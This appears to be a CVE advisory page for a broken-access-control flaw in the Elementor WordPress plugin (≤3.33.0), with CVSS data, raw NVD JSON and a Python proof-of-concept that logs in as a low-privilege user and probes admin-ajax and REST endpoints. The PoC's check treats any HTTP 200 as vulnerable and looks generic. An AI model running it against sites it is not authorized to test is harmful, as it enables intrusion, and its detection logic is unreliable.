Security Vulnerability Report
中文
CVE-2025-67588 CVSS 4.3 MEDIUM

CVE-2025-67588

Published: 2025-12-09 16:18:37
Last Modified: 2026-04-27 18:16:45

Description

Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Website Builder: from n/a through <= 3.33.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Elementor Website Builder <= 3.33.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-67588 PoC - Elementor Authorization Bypass # Target: WordPress site with Elementor Plugin <= 3.33.0 def check_vulnerability(target_url, username, password): """ Check if the target is vulnerable to CVE-2025-67588 This PoC demonstrates attempting to access privileged Elementor functions with a low-privilege user account. """ # Login to WordPress login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } # Perform login response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Attempt to access Elementor privileged functions # These endpoints should require higher privileges privileged_endpoints = [ f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-json/wp/v2/pages", ] # Test for authorization bypass # In a vulnerable version, low-privilege users can access these for endpoint in privileged_endpoints: test_data = { 'action': 'elementor_ajax', 'route': 'editor_get_elements_data' } response = session.post(endpoint, data=test_data) if response.status_code == 200: print(f"[+] Potential vulnerability: {endpoint} accessible") print(f" Response: {response.text[:200]}...") return True if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python poc.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Testing CVE-2025-67588 on {target}") check_vulnerability(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67588", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:36.800", "lastModified": "2026-04-27T18:16:45.100", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Elementor Elementor Website Builder elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Elementor Website Builder: from n/a through <= 3.33.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-33-0-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}